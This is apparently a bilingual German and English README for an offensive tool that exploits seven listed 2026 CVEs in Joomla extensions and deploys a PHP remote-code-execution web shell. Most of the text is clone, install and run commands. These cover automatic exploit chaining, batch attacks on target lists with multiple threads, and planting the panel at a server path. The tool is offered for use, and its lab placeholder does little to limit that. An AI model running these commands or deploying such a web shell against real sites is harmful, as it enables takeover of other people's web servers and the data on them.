Joomla-Multi-CVE-RCE-Suite mit sieben Exploit-Modulen für Balbooa Forms, Page Builder CK, SP Page Builder, JCE, iCagenda, Helix3 und SP LMS sowie x7-panel.php-Payload-Bereitstellung.
Joomla Multi-CVE Suite — 7 Schwachstellen-Module + x7-panel.php Deploy
| CVE | Erweiterung |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
Die Suite führt standardmäßig eine automatische Kette aus; verwende --cve für ein einzelnes Modul.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| Datei | Aufgabe |
|---|---|
winrarzips_brand.py | CMD-Banner (by winrarzips) |
joomla_exploits.py | 7-CVE-Exploit-Module |
CVE-2026-Joomla-Suite.py | Batch- + Einzelziel-CLI |
payloads/x7-panel.php | RCE-Panel |
requirements.txt | Abhängigkeiten |
❌ Ziellisten, Scan-Ergebnisse und Panel-URLs sind nicht im Repo enthalten.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
Bei Joomla-<-5.2.2-Zielen ist der Serverpfad erforderlich:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php
Joomla Multi-CVE Suite — 7 vulnerability modules + x7-panel.php deploy
| CVE | Extension |
|---|---|
| CVE-2026-56291 | Balbooa Forms (com_baforms) |
| CVE-2026-56290 | Page Builder CK (com_pagebuilderck) |
| CVE-2026-48908 | SP Page Builder (com_sppagebuilder) |
| CVE-2026-48907 | JCE (com_jce) |
| CVE-2026-48939 | iCagenda (com_icagenda) |
| CVE-2026-49049 | Helix3 (plg_ajax_helix3) |
| CVE-2026-48909 | SP LMS (com_splms) — Joomla < 5.2.2 + --splms-path |
The suite runs an auto chain by default; use --cve for a single module.
git clone https://github.com/winrarzipsexploit/CVE-2026-87930.git
cd CVE-2026-87930
pip install -r requirements.txt
| File | Role |
|---|---|
winrarzips_brand.py | CMD banner (by winrarzips) |
joomla_exploits.py | 7-CVE exploit modules |
CVE-2026-Joomla-Suite.py | Batch + single-target CLI |
payloads/x7-panel.php | RCE panel payload |
requirements.txt | Dependencies |
❌ Target lists, scan results and live panel URLs are not included.
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --fingerprint
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48908
python CVE-2026-Joomla-Suite.py -f targets.txt --yes --threads 8
For Joomla < 5.2.2 targets, provide server path:
python CVE-2026-Joomla-Suite.py -u https://LAB-URL --yes --cve CVE-2026-48909 --splms-path /var/www/html/tmp/x7-panel.php